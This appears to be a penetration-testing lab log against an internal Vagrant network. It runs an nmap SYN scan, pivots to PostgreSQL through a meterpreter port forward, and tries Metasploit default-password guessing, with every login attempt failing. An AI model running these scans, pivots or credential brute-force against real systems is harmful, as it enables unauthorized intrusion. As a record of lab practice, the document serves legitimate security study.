no diffs until ssh

nmap -sS 172.18.0.0/16
```sh
Starting Nmap 7.80 ( https://nmap.org ) at 2025-05-18 13:11 UTC
Nmap scan report for postgres (172.18.0.1)
Host is up (0.000012s latency).
Not shown: 995 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
443/tcp  open  https
2222/tcp open  EtherNetIP-1
5432/tcp open  postgresql
MAC Address: 26:54:2A:8A:53:02 (Unknown)

Nmap scan report for nginx.vagrant_internal (172.18.0.2)
Host is up (0.000012s latency).
Not shown: 998 closed ports
PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https
MAC Address: CE:E7:60:35:0E:C1 (Unknown)

Nmap scan report for gitea.vagrant_internal (172.18.0.4)
Host is up (0.000012s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp
MAC Address: 7E:05:23:CA:55:6D (Unknown)

Nmap scan report for vaultwarden.vagrant_internal (172.18.0.5)
Host is up (0.000012s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 12:EB:C9:6D:07:4B (Unknown)
```

additional port 5432

This scan reveals an open port 5432, which is commonly used for PostgreSQL, and an open port 22 on the gateway.

meterpreter:
```
msf6 > sessions -u 1
msf6 > sessions -i 2
meterpreter > portfwd add -l 5432 -p 5432 -r 172.18.0.1
[*] Forward TCP relay created: (local) :5432 -> (remote) 172.18.0.1:5432
```

```sh
msf6 auxiliary(server/capture/postgresql) > use auxiliary/scanner/postgres/postgres_version 
[*] New in Metasploit 6.4 - This module can target a SESSION or an RHOST
msf6 auxiliary(scanner/postgres/postgres_version) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 auxiliary(scanner/postgres/postgres_version) > run
[*] 127.0.0.1:5432 Postgres - Version Unknown (Pre-Auth)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
```

```sh
msf6 auxiliary(scanner/postgres/postgres_login) > use auxiliary/scanner/postgres/postgres_login
[*] New in Metasploit 6.4 - The CreateSession option within this module can open an interactive session
msf6 auxiliary(scanner/postgres/postgres_login) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 auxiliary(scanner/postgres/postgres_login) > set BLANK_PASSWORDS true
BLANK_PASSWORDS => true
msf6 auxiliary(scanner/postgres/postgres_login) > run
[!] No active DB -- Credential data will not be saved!
[-] 127.0.0.1:5432 - LOGIN FAILED: :@template1 (Incorrect: FATAL	VFATAL	C28000	Mno PostgreSQL user name specified in startup packet	Fpostmaster.c	L2273	RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :@template1 (Incorrect: FATAL	VFATAL	C28000	Mno PostgreSQL user name specified in startup packet	Fpostmaster.c	L2273	RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :tiger@template1 (Incorrect: FATAL	VFATAL	C28000	Mno PostgreSQL user name specified in startup packet	Fpostmaster.c	L2273	RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :postgres@template1 (Incorrect: FATAL	VFATAL	C28000	Mno PostgreSQL user name specified in startup packet	Fpostmaster.c	L2273	RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :password@template1 (Incorrect: FATAL	VFATAL	C28000	Mno PostgreSQL user name specified in startup packet	Fpostmaster.c	L2273	RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: :admin@template1 (Incorrect: FATAL	VFATAL	C28000	Mno PostgreSQL user name specified in startup packet	Fpostmaster.c	L2273	RProcessStartupPacket)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:tiger@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:password@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:admin@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "scott"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "scott"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:tiger@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "scott"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:postgres@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "scott"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:password@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "scott"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: scott:admin@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "scott"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "admin"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "admin"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:tiger@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "admin"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:postgres@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "admin"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "admin"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "admin"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:postgres@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:password@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: postgres:admin@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "postgres"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:admin@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "admin"	Fauth.c	L335	Rauth_failed)
[-] 127.0.0.1:5432 - LOGIN FAILED: admin:password@template1 (Incorrect: FATAL	VFATAL	C28P01	Mpassword authentication failed for user "admin"	Fauth.c	L335	Rauth_failed)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Bruteforce completed, 0 credentials were successful.
[*] You can open a Postgres session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
```